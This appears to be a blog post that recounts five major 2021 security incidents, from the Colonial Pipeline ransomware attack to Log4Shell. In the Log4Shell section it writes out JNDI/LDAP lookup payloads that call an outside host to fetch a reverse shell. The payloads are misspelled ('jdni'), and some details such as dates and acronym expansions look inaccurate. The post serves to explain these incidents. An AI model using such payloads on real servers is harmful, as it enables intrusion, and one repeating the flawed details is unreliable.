10 min. read

March 29, 2022

The Top 5 Hacks of 2021

Here are some of my favourite hacks from last year

Wesley_profile

XSS Rat

In 2021 the world was expected to lose six trillion dollars to cybercrime, this is according to a report from Cybersecurity Ventures. We can’t verify if that estimate was spot but given 2021 seemed like a year for hackers, who produced one huge data breach after another, it’s likely the losses are accurate. And as a nice note for cybersecurity professionals, these estimated yearly losses are expected to double by 2025!

While there were numerous hacking scandals in 2021 (you might remember SolarWinds or CD Projekt Red) I’m here to talk about the five most interesting ones to me as a hacker. I’ll explain how the hack happened and how the hack wreaked havoc. Hopefully, you can learn from the mistakes of these large corporates!

1. Colonial pipelines

Despite the global shift towards green energy, we still rely heavily on fossil fuels to travel, heat our apartments, and power our cities. If someone were to cut that lifeline things would get a bit crazy. Well, that’s exactly what the ransomware gang, DarkSide, did in July 2021. DarkSide set its sights on the Colonial Pipelines, major pipelines running across America. 

The Colonial pipeline was constructed by the Colonial Pipeline Company in 1962. It spans a massive 5,500 miles ( 8,850 kilometers) between Texas and New York and consists of two huge pipes which carry three million barrels of fuel every single day!

DarkSide hit the pipeline with a major cyber attack which indirectly caused a temporary fuel shortage across America. How? The hackers encrypted important files with a password. This made it impossible for the Colonial Pipelines Company to bill their customers since they didn’t have access to the information, basically messing up their entire operation. 

DarkSide offered to sell the decryption key back to Colonial Pipelines for a small fee of 75 Bitcoins (about 4 million USD at the time). The company, held hostage, delayed the payout, hoping the authorities would catch the hackers, and this led to a nationwide fuel shortage. 

What ensued was a domestic scramble for gas, kind of like the COVID toilet paper shortage. There were reports of fuel stockpiling and empty gas stations all across America. 

In the end, the Colonial Pipeline Company folded and paid the Bitcoins. And while the DarkSide gang hasn’t been brought to justice, the FBI has said they’ve reclaimed most of the ransom and have stuck the gang with a pretty hefty bounty ($10,00,000 USD) — so if you know anyone that was involved…

2. Kaseya hack

kaseya hack 2021

You might not have heard of this company, Kaseya. It’s a big MSP (Multi-service provider) hoster, pretty widely recognised in the industry. Kaseya services IT departments and MSPs in all sorts of companies large and small, including some government departments.

In July 2021, Kaseya was hit by a cyberattack from a group known as REvil (Russian-based hackers). They installed malware on the systems of Kaseya which then in turn infected the other systems connected (i.e. companies that were using Kaseya software). This is what we call a supply chain attack. Hackers target one system with the aim of infecting many more connected systems. 

The attackers were able to do this by discovering a leak in the Kaseya software, and the worst part is this leak was known within the company for a long time (slow clap). Apparently, Kaseya was working to fix the vulnerability but by the time the patch was ready, it was already too late.  

It turns out that the hackers abused a SQLi vulnerability. This is where attackers will send malicious input to fool SQL queries, for example, queries that are used for logging in. They were able to log in this way and get around the authentication measures in place.

The Kaseya systems were compromised one by one. In total over 1500 organisations got struck by this monster attack. REvil demanded varying ransoms depending on the organisation, anything from $45,000 to $15 million. 

In the final moments of this hack, the creator offered to sell a universal decryptor for a flat fee of $70 million. Unfortunately for him, he was caught before receiving any funds, ending his ransomware spree but not without infecting hundreds of organisations.

Those gossiping on Twitter tried to pin this attack on Putin since it was supposedly run out of Russia. Likewise, it was also suspected U.S. agencies were involved in the attacks since they don’t have the best track record… 

The whole ordeal lasted only a few weeks before a security firm released a universal decryptor. This unlocked the files that had previously been encrypted, giving those organisations affected their files back. 

After a few days of tense decrypting, a large portion of Kesaya’s customers could breathe a sigh of relief. But as far as the US homeland’s CISA (Cybersecurity and Infrastructure Security Agency) is concerned, this is far from over. They are busy warning MSPs (Multi-service providers) and their clients about the risks and even released guidelines for both sides of the attack.

3. Twitch

twitch hack

The popular streaming platform, Twitch, has taken massive strides in the last few years. There’s been a surge in viewers with Twitch attracting and retaining huge influencers. Generally, Twitch has been known to pay their talent quite well, often striking massive deals to keep them on the streaming platform. 

The community has always been quick to call out Twitch on its mistakes, so when last year’s data breach happened, it was the perfect nightmare. What sparked this breach was a very simple misconfiguration in a server. A malicious third party used this exploit and was able to steal some very valuable data from Twitch, including its source code. 

You’d think that having your source code leaked would be bad enough, that’s like Coca-Cola’s secret recipe being leaked. Yet on top of the code leak, all of Twitch’s top creator's revenue data was also leaked. The creators were not happy. The donation data, bit gifts (bits are a small form of currency viewers can use to donate to their favorite creators), and ad revenue all posted for public consumption (see below).

In total, 128GB of data was leaked which made a big dent in the public image of the company from which they have mostly recovered, but not before having to endure huge backlash for this seemingly innocent misconfiguration. The nefarious culprits behind this hack have yet to be caught. 

4. Microsoft Exchange hacks

Microsoft hacks 2021

Microsoft Exchange is a popular mail server used by many businesses and companies, similar to Google Workspace. When they got hacked in January, supposedly by Hafnium, a Chinese state-sponsored hacking group, it spelled disaster for many companies. Email addresses and passwords were compromised, and private emails were leaked —  all those sensitive company exchanges you don’t want millions of people reading…

Around 250,000 servers were exploited, exposing NGOs, Universities, and local governments. Outside of the USA, the attack also hit banks, costing their clients millions of dollars in compound damage.

Besides stealing emails, a new class of exploit was released which is known as a crypto locker. This exploit could encrypt all the files on an exchange server, rendering it inoperable until a ransom is paid and even then, the hacker might not release the key.

A patch was released in March to combat the hack but it took weeks and even months before it got fully rolled out, meaning the damage was more or less done. Thankfully though, Microsoft was able to report that 92% of the existing exchange servers had been patched by March 22nd.

Isn’t it funny how China seems to just get away with hacking a huge American corporation without the slightest repercussions…

5. Log4Shell

Near the end of 2021, an exploit was discovered giving Java application sysadmins probably their worst week ever. When the exploit first came to light, there was uncertainty all round as servers got struck left and right. Even Minecraft servers got hit with this remote code execution. 

The exploit enabled attackers to execute their own code on the server. As a result, attackers are able to take over any internet-connected server or service that contains the vulnerable log4j include.

The hack worked by exploiting something called “Message lookup substitution” which can be compared to the templating functionality some of you might be familiar with. Basically, some strings can trigger code to execute commands such as ${java: version} which will print the version of Java i.e. “version 2.4.6_4”. This is an innocent code execution but some strings can execute much worse code such as ${jdni:ldap://hackxpert.com} which could trigger an HTTP request from the logs to hackxpert.com. This exploit has gotten a Common Vulnerability Scoring System (CVSS) of 10.0 (critical severity). Such a high rating seems unusual but when considering how trivial the attack vector is and what the consequences are, this is a normal consequence.

When the attackers sent out a request containing the string (${jdni:ldap://hackxpert.com} for example), the attacker would first see a request being made to their web server. Consequently, they would host malicious code on their web server which they would request again (${jdni:ldap://hackxpert.com/exploit.php} for example where exploit.php contains a reverse shell). This might grant the attacker access to the server if their code is executed.

When the exploit was first released, some crafty Minecraft players were even able to exploit this to gain real-life cash by manipulating game servers. They would backdoor into the servers using this exploit and assign themselves items on servers that enable real-world trading. They were then able to sell all these items for a massive profit!

Updates eventually get released to patch the problem but with over 7000 maven contexts containing Log4J, this will be dragged out for months if not years to come. Though it is certain most servers have been fixed by now, who knows how many are still vulnerable because they did not implement proper security protocols?

Summary

When we think about hacks we often think of the Bitcoin ransoms and monetary loss incurred. But in reality, losing a couple of Bitcoin is only the tip of the iceberg. Public hacks like those mentioned above expose personal details, destroy reputations, turn off investors, and make public what is discussed in private. Hell, the Colonial Pipelines hack caused weeks of panic and exposed the weakness of one of the mightiest nations. 

What’s frightening about this list is that only one of these major hacker groups was brought to justice. That says something about the level of cybercrime sophistication going on out there. And when you look at it, none of these are small players — Microsoft, Twitch (Amazon-owned), these are global companies. If they’re not safe, what does that say about the average internet user? It’s more important than ever to stay vigilant and not let the rise in technology blind us to its inherent dangers.